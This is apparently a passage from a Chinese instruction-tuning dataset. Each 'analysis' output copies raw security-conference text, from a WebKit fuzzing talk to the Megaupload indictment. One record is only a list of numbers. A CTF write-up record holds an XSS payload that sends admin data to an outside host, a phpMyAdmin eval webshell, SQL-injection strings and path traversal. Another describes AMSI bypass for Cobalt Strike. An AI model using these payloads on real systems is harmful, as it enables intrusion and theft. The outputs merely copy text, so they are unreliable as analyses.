"text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKCon KCon Webkit Vulnerability form 0 to 1 Lockmanxxx Work for 兴华永恒 软件漏洞利用研究 软件漏洞成因分析 偶尔漏洞挖掘 @weibo:Lockmanxxx @twitter:lockmanxxx who 高效的挖掘 From 0 to 1 目录 CONTENTS PART 01 浏览器漏洞挖掘难点 PART 02 Why WebKit PART 03 挖掘思路 PART 04 挑战 PART 05 漏洞挖掘平台 PART 06 展示 PART 07 To Do Soon 01 浏览器漏洞挖掘难点 https://www.flexerasoftware.com/enterprise/resources/research/vulnerability-review/  Webkit  Blink(chrome)Apple Safari  Gecko  Fireforx  Trident  Internet Explorer  JavaScript Engine也开始出现分化 Browsers 02 Why Webkit? 特点  开源  Chrome,safari, Ucbrowser, QQ Browser  多平台支持Android+windows+linux  WebKitGTK oMiniborwser oWebKitWebProcess oWebKitNetworkProcess oJSC WebKitGtk Webkitgtk Webkit引擎 WebCore JavaScriptCore(jsc) 挖掘思路 03 + (E=mc2) => 首先 其次  代码分析不深入  铀  根据分析搜集的数据定制fuzz输入  E=mc2  随机规则  挖掘平台  根据代码覆盖率不断完善 详细 挑战J 04 网页模型 挖掘对象 WebKit parser  Html -解释型 -DOM树  JavaScript -脚本语言 -词法-语法-语义-字节码-编译-优化-汇编 HTML parser Code Flow WebKitWebView WebCore::Page WebCore::DocumentLoader WebCore::MainFrame WebCore::FrameLoader WebCore::HTMLDocument WebCore::DOMWindow WebCore::HTMLDocumentParser WebCore::HTMLScriptRunner page Main Frame Sub Frame HTML parser  HTMLàHTMLToken (标签提取)  https://html.spec.whatwg.org/  根据标签的开闭合字符逐个提取Token HTMLDocumentParser::pumpTokenizerLoop HTMLTokenizer::processToken  类似字符串整理表现形式为vector对象链表 HTML parser  processToken HTML parser  HTMLTokenàDOMTree  根据前面提取信息进行逐个解析 HTMLTreeBuilder::processToken  HTMLTokenàDOM Node WebCore::HTMLConstructionSite 评估  HTML parser  过程单一  解释性操作  对HTML来说重要的仅仅就是标签的开闭合 HTML Parser L JavaScript Parser  JavaScript  ./source/JavaScriptCore/parser  JavaScript parser入口 JavaScript Parser  工作流 Parser.cpp 解析代码 ASTBuilder.h makeMultNode makeDivNode  Node.h  TreeBuilder->vector(AST tree) VM,SourceCode JavaScript Parser  解析流程 词语提取 词语检查(lexer) 词法解析(parser) 词法检测(Syntax) SourceElement ASTTree Stack 同时进行也是 最复杂的地方 Parser Class JavaScript Parser  对象地图 ASTBuilder Parser Nodes.h Node ExpressionNode ArrayNode VoidNode NewExprNod e  StatementNode ForNode IfElseNode  JavaScript Parser  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThrough the looking-glass, and what Eve found there http://www.s3.eurecom.fr/lg/ Luca 'kaeso' Bruno <lucab@debian.org>, Mariano 'emdel' Graziano <graziano@eurecom.fr> 2 10/08/2014 About us  S3 group at Eurecom (FR) - System security  Embedded systems  Networking devices  Critical infrastructures  Memory forensics  Malware research 3 10/08/2014 Outline  Motivations  Intro to looking glasses  Threats  Vulns & incidents  Countermeasures 4 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- terrorist looking for the next target Aim: critical infrastructure Impact: worldwide Skill level: low Goal: break havoc 5 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- terrorist looking for the next target The Internet Impact: worldwide Skill level: low Goal: break havoc 6 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- terrorist looking for the next target The Internet Traffic routing across ASes Skill level: low Goal: break havoc 7 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- terrorist looking for the next target The Internet Traffic routing across ASes Basic web skills, google dorks, etc... Goal: break havoc 8 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- terrorist looking for the next target The Internet Traffic routing across ASes Basic web skills, google dorks, etc... Gaining access to BGP routers 9 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- terrorist looking for the next target A good candidate: LOOKING-GLASS 10 10/08/2014 Outline  Motivations  Intro to looking glasses  Threats  Vulns & incidents  Countermeasures 11 10/08/2014 The Internet  A networks of networks, glued by BGP http://www.caida.org/research/topology/as_core_network/2014/ 12 10/08/2014 One routing-table, many routing-tables  BGP is worldwide, each AS routing table is a (partial) local view  What you see depends on where you are", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefcon 25 The Internet Already Knows Im Pregnant Kashmir Hill - kashmir.hill@gizmodomedia.com - @kashhill Cooper Quintin - cooperq@eff.org - @cooperq Defcon 25 Intro Kashmir  Journalist  Privacy Expert  New Mother Cooper  Hacker  Privacy Activist  Cares about privacy issues for people with wombs Defcon 25 Skill sets Kash Cooper Defcon 25 Defcon 25 How to hide a baby bump Defcon 25 Retailers want to know whos preggers Defcon 25 How not to hide it Defcon 25 What apps we tested pTracker Glow nurture clue eve what to expect pregnancy+ webmd baby pinkpad flo my calendar (Book) mycalendar (Face) fertility friend get baby babypod BabyBump Ovia The Bump Maya Defcon 25 The logos Defcon 25 Defcon 25 Why people use these apps Defcon 25 What these apps ask about Defcon 25 Who figured out I was pregnant Twitter Defcon 25 These people. (My inbox at 6 months) Defcon 25 Fun with Fine Print What To Expect privacy policy 4000 words = 8 pages long Defcon 25 The What to Expect Select Partners List Defcon 25 How This Can Go Wrong Not everyone who gets pregnant stays pregnant. Defcon 25 Fun with Fine Print The Bump privacy policy 4700 words = 10 pages Defcon 25 Babys First Wiretap If you use this feature to call a third party, we will record the phone call and any message you leave for the third party, as well as call information such as the number dialed, the date and time of the call and its duration, and your location as determined by your area code or as otherwise permitted. Defcon 25 WTF ~Contacted The Bump~ Their response: [W]e do not record phone calls. The language is legacy language from prior contemplated features for The Knot that we do not use in either The Knot or The Bump apps. I've sent a note to my legal team to update this language in our privacy policy. Defcon 25 Fun with Fine Print Ovia Terms of Use 6,100 words = 14 pages Defcon 25 Downloader, beware Please do not ask Ovia Health for--or rely on--anything we communicate as medical advice. Although our apps, website, im", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeyond Security Put something on the internet - Get hacked 1 Beyond Security Agenda  About me  IoT  IoT core problems  Software  Hardware  Vulnerabilities  What should I do? Beyond Security  Been interested in the field of security since childhood  Doing network analysis, forensics, dark web intelligence gathering, social engineering, etc.  Served 7 years in the Israeli army  Loves extreme sports (motorcycles / hiking / diving etc) About me  Maor Shwartz Beyond Security About Beyond Security  The company today:  SecuriTeam Secure Disclosure - vulnerability acquisition program since 2007  AVDS - vulnerability management system  beSTORM - a commercial fuzzing tool Beyond Security IoT - Introduction  The Internet of Things (IoT) is the inter-networking of physical devices, vehicles, buildings, and other items embedded with electronics, software, sensors, actuators, and network connectivity which enable these objects to collect and exchange data  The IoT allows objects to be sensed or controlled remotely across existing network infrastructure Beyond Security IoT Beyond Security And what about security? 7 Beyond Security Beyond Security IoT devices on the internet(1) Beyond Security IoT devices on the internet(2) Beyond Security IoT devices on the internet(3) Beyond Security Why there are so much vulnerabilities? Hardware Software Beyond Security Hardware Beyond Security Software  Inexperienced developers  Programming language  Outdated kernel  Unknown OS  Outdated firmwares  Lack of software update mechanism  3rd party services Beyond Security Vulnerabilities types  Path Traversal  DHCP  MiTM  Firmware upgrade  Upload arbitrary files  Header injection (Global variables)  Api Disclosure  Hard-coded Credential  Command injection  Memory Disclosure Beyond Security Vulnerabilities types (1)  Memory Disclosure  A memory leak is an unintentional form of memory consumption whereby the developer fails to free an allocated block of memory when no longer needed  Hard-coded Creden", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Abstract This paper will examine how DTrace, a kernel- based dynamic scriptable tracer, can be effectively used for reverse engineering tasks. DTrace offers an unprecedented view of both user and kernel space, which has many interesting implications for security researchers. In this paper we will introduce DTrace, comparing it to existing debuggers and tracers. We will then walk the reader through various applications of DTrace. We will show how to monitor for stack and heap overflows, generate code coverage graphs, trace code paths visually in target applications over the network with IDA Pro, and discuss intrusion detection and evading DTrace. Introduction DTrace was first introduced in Solaris 10 which was released in 2004 by Sun Microsystems. Its development began in 2001 with Sun kernel engineer Bryan Cantrill as the sole developer. The composition of the DTrace core development team was later completed with the addition of Adam Leventhal and Mike Shapiro. Sun Microsystems describes Dtrace as a dynamic tracing framework for troubleshooting systemic problems in real time on production systems. DTrace is made up of several components in the OS kernel and user space and tied together through the D scripting language. DTrace dynamic tracing allows you to view nearly all activity in the system on demand through software embedded sensors called probes. OS X Leopard and Solaris ship with thousands of possible probes in places ranging from deep inside the kernel to user-level applications like web browsers and chat programs. This extensive visibility provides the data that an administrator, developer, or user needs to understand the dynamic and complex relationships between software components. Questions can be asked and answered by querying the data gathered by DTrace probes through D scripts. D is a block-based interpreted language that was created for use with DTrace. D syntax is a described as a subset of C, but is structured much like the syntax of Awk. The dyna", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFILED OPEN COURT IN THE UNITED STATES DISTRICT COURT FOR THE EASTERN DISTRICT OF VIRGINIA Alexandria Division J 6 zuiz CLERK, U.S. DISTRICT COURT ALEXANDRIA. VIRGINIA UNITED STATES OF AMERICA Criminal No. 1:12CR3 Count One: 18 U.S.C.  1962(d) - Conspiracy to Commit Racketeering Count Two: 18 U.S.C. 371 - Conspiracy to Commit Copyright Infringement Count Three: 18 U.S.C.  1956(h) - Conspiracy to Commit Money Laundering Count Four: 18 U.S.C.  2, 2319: 17 U.S.C. 506- Criminal Copyright Infringement By Distributing a Copyrighted Work Being Prepared for Commercial Distribution on a Computer Network & Aiding and Abetting of Criminal Copyright Infringement Counts Five through Eight: 18 U.S.C. 2,2319; 17 U.S.C. 506- Criminal Copyright Infringement By Electronic Means & Aiding and Abetting of Criminal Copyright Infringement Counts Nine through Thirteen: 18 U.S.C. 2, 1343- Fraud By Wire & Aiding and Abetting of Fraud by Wire v. KIM DOTCOM, MEGAUPLOAD LIMITED, VESTOR LIMITED, FINN BATATO, JULIUS BENCKO, SVEN ECHTERNACH, MATHIAS ORTMANN, ANDRUS NOMM, and BRAM VAN DER KOLK, Defendants SUPERSEDING INDICTMENT FEBRUARY2012 TERM - at Alexandria, Virginia Case 1:12-cr-00003-LO Document 34 Filed 02/16/12 Page 1 of 90 PageID# 246 THE GRAND JURY CHARGES THAT: GENERAL ALLEGATIONS At all times relevant to this Superseding Indictment: 1. KIM DOTCOM, MEGAUPLOAD LIMITED, VESTOR LIMITED, FINN BATATO, JULIUS BENCKO, SVEN ECHTERNACH, MATHIAS ORTMANN, ANDRUS NOMM, and BRAM VAN DER KOLK, the defendants, and others known and unknown to the Grand Jury, were members ofthe \"Mega Conspiracy,\" a worldwide criminal organization whose members engaged in criminal copyright infringement and money laundering on a massive scale with estimatedharm to copyrightholders well in excessof$500,000,000 and reportedincome in excess of $175,000,000. 2. Megaupload.comis a commercialwebsite and service operated by the Mega Conspiracy that reproduces and distributes copies of popular copyrighted content over the Internet", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nupdatedb === 创建或更新slocate命令所必需的数据库文件 ## 补充说明 **updatedb命令** 用来创建或更新slocate命令所必需的数据库文件updatedb命令的执行过程较长因为在执行时它会遍历整个系统的目录树并将所有的文件信息写入slocate数据库文件中 补充说明slocate本身具有一个数据库里面存放了系统中文件与目录的相关信息 ### 语法 ```shell updatedb(选项) ``` ### 选项 ```shell -o<文件>忽略默认的数据库文件使用指定的slocate数据库文件 -U<目录>更新指定目录的slocate数据库 -v显示执行的详细过程 ``` ### 实例 实用updatedb命令的`-U`选项可以指定要更新slocate数据库的目录 ```shell updatedb -U /usr/local/ 更新指定命令的slocate数据库 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSCTF2018-WP Author: Nu1L SCTF2018-WP Author: Nu1L Web easiest web - phpmyadmin NGINX BabySyc - Simple PHP Web BabyIntranet Pwn bufoverflow_a sbbs bufoverflow_b WTFgame Crypto ElGamal Hacker a number problem it may contain 'flag' Misc Modbus Re Babymips Script In Script Where is my 13th count crackme2 simple Web {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} amdin http://116.62.137.114:4879/api/memos/admintest2313 adminClound payload: ` {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\"JC5wb3N0KCcvYWRtaW4vZmlsZScseydmaWxlcGFzc3dkJzonSEdmXiYzOU5zc2xVSWZeMjMnf SxmdW5jdGlvbihkYXRhKXsobmV3IEltYWdlKCkpLnNyYz0iaHR0cDovL3hzcy5udXB0emouY24vP2luZm89Iit lc2NhcGUoZGF0YSk7fSk7\"));//');}} ` easiest web - phpmyadmin set global general_log='on'; SET global general_log_file='C:\\phpStudy\\WWW\\phpmyadmin\\had.php'; SELECT '<?php @eval($_GET[1]);?>'; ```` flagC ### Zhuanxv github: ![](https://i.imgur.com/gYFVGKZ.png) `6yhn7ujm` `http://121.196.195.244:9032/loadimage?fileName=../../WEB- INF/classes/com/cuitctf/service/impl/UserServiceImpl.class` sql= %0a `user.name=homamamama'%0aand%0a'1'>'1&user.password=6yhn7ujm` Hsqlpaper`New Methods for Exploiting ORM Injections in Java Applications`mysql NGINX NGINX /static../etc/passwd NGINX ```php user.name=a\\''or%0a(select%0agroup_concat(`welcometoourctf`)%0afrom/**/`bc3fa8be0d b46a3610db3ca0ec794c0b`)%0alike%0abinary%0a\"%25\"%0a%23&user.password=6yhn7ujm ... proxy_cache_path /tmp/mycache levels=1:2 keys_zone=my_cache:10m max_size=10g inactive=30s use_temp_path=off; limit_conn_zone $binary_remote_addr zone=conn:10m; limit_req_zone $binary_remote_addr zone=allips:10m rate=2r/s; server { listen 4455 default_server; server_name localhost; location /static { alias /home/; } location ~* \\.(css|js|gif|png){ proxy_cache my_cache; proxy_cache_valid 200 30s; proxy_pass http://bugweb.app:8000; proxy_set_header Host $host:$server_port; proxy_ignore_headers Expires Cache-Control Set-Cookie; } location / { limit_conn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVoIPhreaking How to make free phone calls and influence people by the grugq Agenda  Introduction  VoIP Overview  Security  Conclusion Voice over IP (VoIP) Good News  Cheap phone calls  Explosive growth in recent years  Internet telephony converging with the PSTN Other News  Immature security best practises  Free, anonymous, phone calls VoIP Overview Agenda  Infrastructure  Protocols  Signalling protocols  Media protocols  PSTN integration protocols How VoIP Works  Mimics traditional POTS service  Multiple interconnecting protocols  Protocol realms of responsibility  Signalling  Media  PSTN integration  An example, in detail... How VoIP Works, cont.  Alice dials Bob  Signalling Protocols:  Location  Alice is @ aaa.bbb.ccc.ddd  Where is Bob?  Presence  Is Bob available?  Media Protocols  Codec  Stream location How VoIP Works  Bob picks up the phone  Signalling protocols  Location  Bob is at aaa.bbb.ccc.ddd  Presence  Bob is available (he picked up the phone, duh)  Media Protocols  Codec  Negotiated shared codec capabilities  Stream location More 'how it works'  Bob hangs up  Signalling  Terminate the call  Media  Stop receiving the stream Infrastructure Components which implement VoIP Infra. Short list  VoIP Phones  Software  Hardware  Internet technology  Routers  DNS  PSTN integration technology  Media Gateway  Signalling Gateway VoIP Protocols Signalling & Media Protocols  Separation of signalling and media  Several competing standards  Signalling  SIP vs. H.323  PSTN integration  MGCP vs. Megaco  Proprietary protocols as well  Skype  Recently cracked by a Chinese company. Signalling Protocols H.323  Early VoIP protocol set  ASN.1 PER encoded protocol  Convoluted, complex, broken implementations  No two H.323stacks seamlessly interoperate  Open Source stacks are... not ideal  No public attack tools to speak of SIP  Session Initiation Protocol  RFC 3261  Based on HTTP  Error codes will look familiar  200 OK, 404 Not Found, 403 Forbidden, etc.  Plain text protocol  U", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Business Logic Errors ## Introduction Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization. ## Where to find This vulnerability can appear in all features of the application. ## How to exploit 1. Review Functionality - Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product. - Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve. - Try to see if the same user can post multiple ratings for a product. This is an interesting endpoint to check for Race Conditions. - Try to see if the file upload field is allowing any exts, it's often observed that the devs miss out on implementing protections on such endpoints. - Try to post reviews like some other users. - Try performing CSRF on this functionality, often is not protected by tokens 2. Coupon Code Functionality - Apply the same code more than once to see if the coupon code is reusable. - If the coupon code is uniquely usable, try testing for Race Condition on this function by using the same code for two accounts at a parallel time. - Try Mass Assignment or HTTP Parameter Pollution to see if you can add multiple coupon codes while the application only accepts one code from the Client Side. - Try performing attacks that are caused by missing input sanitization such as XSS, SQLi, etc. on this field - Try adding discount codes on the products which are not covered under discounted items by tampering with the request on the server-side. 3. Delivery Charges Abuse - Try tampering with the delivery charge rates to -ve values to see if the final amount can be reduced. - Try checking for the free delivery by tampering with the params. 4. Currency Arbitrage - Pay in 1 currency say USD and try to get a refund i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUniversal RF Usb Keyboard Emulation Device URFUKED -by Monta Elkins monta.defcon @ geekslunch.com version .08 6/2010 Updates at: http://www.hackerwarrior.com/urfuked Updates at: http://www.hackerwarrior.com/urfuked Hardware Receiver (plugged into spare USB port) Quarter Teensy Microcontroller RF receiver On the back Receiver is very small Can be encased in plastic to look like a typical USB key Pwner portable, battery powered, rf transmitter Power Switch LEDs Show What Attack to Perform Input Switch Set Attack 0wnzred Switch Transmits Attack Hardware Construction Teensy uc Transmitter Transmitter Datasheet http://www.sparkfun.com/datasheets/Wireless/General/MOSAWR.pdf Data Pin D3 (tx) Teensy 2.0 Receiver Receiver Datasheet http://www.sparkfun.com/datasheets/Wireless/General/MORX3400.pdf Data Pin is D2 Antenna is 23 cm long Teensy 2.0 Use either of two Ground Pins on Teensy (connect all reciever grounds) Use either of two Vcc pins on Teensy Receiver Construction Teensy 2.0 Microcontroller $18 Sparkfun RF Reciever 315 Mhz $4.95 Construction consists of soldering 7 wires. Simple! Pwner Construction (rf transmitter) Front View Rear View Teensy Microcontroller $18 Sparkfun RF Transmitter $3.95 Teensy Pins Pwner Schematic Pwner Case Pwner Case Receiver Assembled Live Demo Canned Demo Windows Attack 01 URFUKED opens the windows run dialog box using the keyboard shortcut windows key + R In this demo it runs the benign command notepad.exe but any other valid command could be executed. Windows Attack 01 (continued) After opening the notepad.exe window, URFUKED types text into the window in this demonstration attack Inspiration Inspiration Inspired by (Adrian Crenshaw) the IronGeek's: Programmable HID USB Keystroke Dongle [PHUKD]. URFUKED overcomes the blind timing, and attack selection difficulties, by incorporating an RF transmitter and expands the concept to include multiple O.S. attacks. [Adrian, I know you're here somewhere, Thanks! I owe you a beer.] Interface Details Us", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH TSORT 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 tsort \\- 进行拓扑排序 .SH 概述 \\fBtsort\\fP [\\fI\\,选项\\/\\fP] [\\fI\\,文件\\/\\fP] .SH 描述 .\\\" Add any additional description here .PP 输出一个完全有序的列表其与先前给定文件中已有的部分排序顺序相一致 .PP 如果没有指定文件或者指定文件为\\-则从标准输入读取 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 Mark Kettenis 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/tsort> .br 或者在本地使用 info \\(aq(coreutils) tsort invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntranet Invasion Through Anti-DNS Pinning David Byrne, CISSP, MCSE Security Architect EchoStar Satellite / Dish Network David.Byrne@echostar.com JavaScript Malware  Cross Site Scripting (XSS)  Port scanning  Web site fingerprinting  Cross Site Request Forgery (CSRF)  Browser history theft  Self-propagating worms Same Origin Policy  Netscape started it in Navigator 2 when JavaScript debuted  The same origin policy prevents documents or scripts loaded from one origin from getting or setting properties of a document from a different origin.  Mozilla.org  Both documents must have the same protocol, the same hostname the and same port; IP address must be ignored because of virtual hosts  Cross Site Scripting gets around this by injecting JavaScript into the targeted site. Without rare client- side vulnerabilities, a properly secured site is not vulnerable Useful data Victim browser Attack Web Server 13.1.2.3 Victim Web Server 10.4.5.6 Attack DNS Server attacker.com Attack code Request 13.1.2.3 evil.attacker.com 10.4.5.6 Attack request Useful data DNS Pinning  Intended to prevent DNS spoofing attacks  It forces a browser to pin the first DNS response for a hostname  The first attack against it was documented in 1996 by Princeton researchers. Their attack was against the JVM and is no longer viable.  May violate RFC 2616 RFC 2616: Hypertext Transfer Protocol -- HTTP/1.1 15.3 DNS Spoofing  If HTTP clients cache the results of host name lookups in order to achieve a performance improvement, they MUST observe the TTL information reported by DNS. If HTTP clients do not observe this rule, they could be spoofed when a previously-accessed server's IP address changes. As network renumbering is expected to become increasingly common, the possibility of this form of attack will grow. Observing this requirement thus reduces this potential security vulnerability. Defeating DNS-Pinning  Process Termination 1. Get the victim browser to request an attack payload 2. Wait for the browser ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOctopus v1.0 stable: Cobalt Strike deployment 原文 https://shells.systems/octopus-v1-0-stable-cobalt-strike-deployment-much-more/ 使用教程: https://shells.systems/unveiling-octopus-the-pre-operation-c2-for-red-teamers/ stable版本发布: https://github.com/mhaskar/Octopus/releases/tag/v1.0 一.Intorduction 很早之前就是用过Octopus beta v1.0版本当时是听说它的免杀能力特别好推荐说是吊打一切 AV(当时完全不懂代码 原理什么的当然现在还是不懂)本文给大家带来Octopus与Cobalt Strike的 使用心得 1.Octopus 特性 Octopus算是前置C2并不像CS那样集成了后渗透所有的东西 比如端口扫描横向渗透代理等 2.更新日志 从Octopus直接部署Cobalt Strike Beacon DigiSpark payload生成 windows 7 自定义 oneliner 结果记录 通过配置文件自动杀死 新的绕过 AMSI 同时作者也讲了Octopus目前是基于命令行界面形式未来发展计划增加一个Web GUI个人觉得提炼 出每一个工具独有的特点然后合理利用是最有效的集成的框架类C2 CS已经很不错了 3.修复的Bug python2.7 执行Octopus失败 加密错误处理 处理一些EOF议题 无效的监听器处理 二. New AMSI ByPass 一键部署 CS Octopus 将在当前PowerShell进程中禁用AMSI然后加载Cobalt Strike beacon接下来直接运行 deploy_cobalt_beacon beacon.path 关于绕过AMSI研究参考 https://xz.aliyun.com/t/3095 If you don't know what's the amsi(AntiMalware Scan Interface),you could input \"amsiutils\" into powershell console,like this. AMSI(AntiMalware Scan Interface)基于字符串扫描接口通常使用base64或者XOR进行编码然后在 内存中解码绕过AMSI要检测编码后的字符串对于AMSI需要更高的抽象能力通常来说还是比较有 效的 OK本文是研究Octopus的powershell与AMSI的研究不在此范畴 三. Auto_kill 简单来说就是你的C2被防火墙或者其他原因down掉了Octopus将尝试重新连接到服务器连接次数 为预设值在profile.py auto_kill=10 设置超过连接次数自动杀死 四.演示 satger VT查杀率 https://www.virustotal.com/gui/file/ae949e2a84485c8d4af87878fb058e43752744c1c8a3a8a8824 de6dccaf7c29c/detection disable_amsi 好像不起作用 下文会有呼应 deploy_cobalt_beacon 部署成功 由于beacon.ps1本身含有恶意文件不落地到目标磁盘上通过进 程注入方式内存加载目前测试 windows defenders还可以绕过 关键词: memory patching 禁用 AMSI 相关细节参考: https://www.cyberark.com/resources/threat-research-blog/amsi-bypass-redux beacon监听器选择https执行危险行为也不会拦截 五.原理学习 其他的日志记录屏幕截图dll先暂时不涉及 主程序 octopus.py; 配置程序 profile.py core/ 核心包括加密模块函数模块等 module模块 包含了 ILBypass.ps1, ASBBypass.ps1. 通读octopus.py模块 主程序 循环监听等待输入命令后面基本上都是模块如何使用用法简介等 其实我最想看的是 deploy_cobalt_beacon以及disable_amsi如何实现的在此之前呢先来看看 profile.py配置模块 profile.py profile.py web listener配置, 服务器为nginx当然作者还没开发出来web端配置就相当于Octopus 的一个路由 core核心模块 包含四个文件 enc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLinux-Stack Based V2X: White Paper Duncan Woodbury, Nicholas Haltmeyer, and Robert Leale {p3n3troot0r, ginsback}@protonmail.com, robertleale@canbushack.com May 13, 2017 Abstract Vehicle-to-vehicle (V2V) and, more generally, vehicle-to-everything (V2X) wireless com- munication enables semi-autonomous driving via the exchange of state information between a network of connected vehicles and infrastructure units. Following 10+ years of standards de- velopment, particularly the IEEE 802.11p and 1609 family, a lack of available implementations has prevented the involvement of the security community in development and testing of these standards. Analysis of the WAVE/DSRC protocols in their existing form reveals the presence of vulnerabilities which render the protocol unfit for use in safety-critical systems. We present a complete Linux-stack based implementation of IEEE 802.11p and 1609.3/4 which provide a means for hackers and academics to participate in the engineering of secure standards for intelligent transportation. 1 Introduction As vehicular ad-hoc networks (VANETs) will serve the purpose of disseminating messages related to critical safety procedures, effective security is vital. A network compromise would allow an adversary to launch a wide array of attacks. Current standards defining the implementation and use of VANETs (IEEE 1609  WAVE) use a certificate management system to assure the confidentiality and authenticity of messages, as well as a misbehavior reporting system to maintain a network-wide distributed trust of participants. If an attacker is able to compromise a peer, they have the ability to launch a variety of attacks. Examples of these threats are as follows:  Distributing false safety messages - Allows the attacker to obstruct or divert traffic by leading vehicles to believe there is an upcoming accident or road block, beacon as an emergency vehicle, or maliciously alert the driver of a fictitious imminent crash. The effects of this can lead to significant ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStargate: pivoting through VNC to own internal networks By Yonathan Klijnsma & Dan Tentler Stargate: pivoting through VNC to own internal networks 2 @ydklijnsma Yonathan Klijnsma Shodan professional, VNC voyeur, watches attackers and contemplates their motives. @Viss Dan Tentler Dark overlord of Shodan, VNC voyeur, security guy with a security company. Stargate: pivoting through VNC to own internal networks 3 Shit on the internet is getting pretty bad. 3 Welcome to the internet - we shall be your guides Stargate: pivoting through VNC to own internal networks 4 Does it get better? 4 Stargate: pivoting through VNC to own internal networks 5 No.. 5 Stargate: pivoting through VNC to own internal networks 6 No. no really 6 Stargate: pivoting through VNC to own internal networks 7 Its currently even worse 7 Stargate: pivoting through VNC to own internal networks 8 It doesnt seem to get better 8 Stargate: pivoting through VNC to own internal networks 9 Security Camera IoT 9 Stargate: pivoting through VNC to own internal networks 10 Internet of Things Conference 10 Stargate: pivoting through VNC to own internal networks 11 Internet of Things Conference 11 Stargate: pivoting through VNC to own internal networks 12 Internet of Things Conference 12 Stargate: pivoting through VNC to own internal networks 13 Everything is being invented again 13 Stargate: pivoting through VNC to own internal networks 14 Everything is being invented again 14 - They have Wifi - They have telnet - Nobody added authentication - There is actually a CVE for not having authentication - WHAT. Stargate: pivoting through VNC to own internal networks 15 They arent getting it, hackers are having fun. 15 Stargate: pivoting through VNC to own internal networks 16 Besides ancient industrial devices we see new toys 16 Stargate: pivoting through VNC to own internal networks 17 Besides ancient industrial devices we see new toys 17 Stargate: pivoting through VNC to own internal networks 18 Besides ancient industria", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDDoS Protecion Total AnnihilationD DDoS Mitigation Lab A DDoS Mitigation Lab Independent academic R&D division of Nexusguard building next generation DDoS mitigation knowledge and collaborate with defense community. Industry body formed to foster synergy among stakeholders to promote advancement in DDoS defense knowledge. DDoS Mitigation Lab DDoS Mitigation Lab  DDoS Relevance, Attack Categories, Detection & Mitigation  Source Host Verification: Authentication Methods  TCP SYN Auth  HTTP Redirect Auth  HTTP Cookie Auth  JavaScript Auth  CAPTCHA Auth  PoC Tool  TCP Traffic Model  HTTP Traffic Model DDoS Mitigation Lab Source: NTT Communications, Successfully Combating DDoS Attacks, Aug 2012 DDoS Mitigation Lab Volumetric Semantic Blended DDoS Mitigation Lab Complexity Simple Sophisticated Volume xxx Gbps+ xxx Mbps+ DDoS Mitigation Lab Traffic Policing Proactive Resource Release Black- / Whitelisting xxx Gbps+ xxx Mbps+ Complexity Simple Sophisticated Volume DDoS 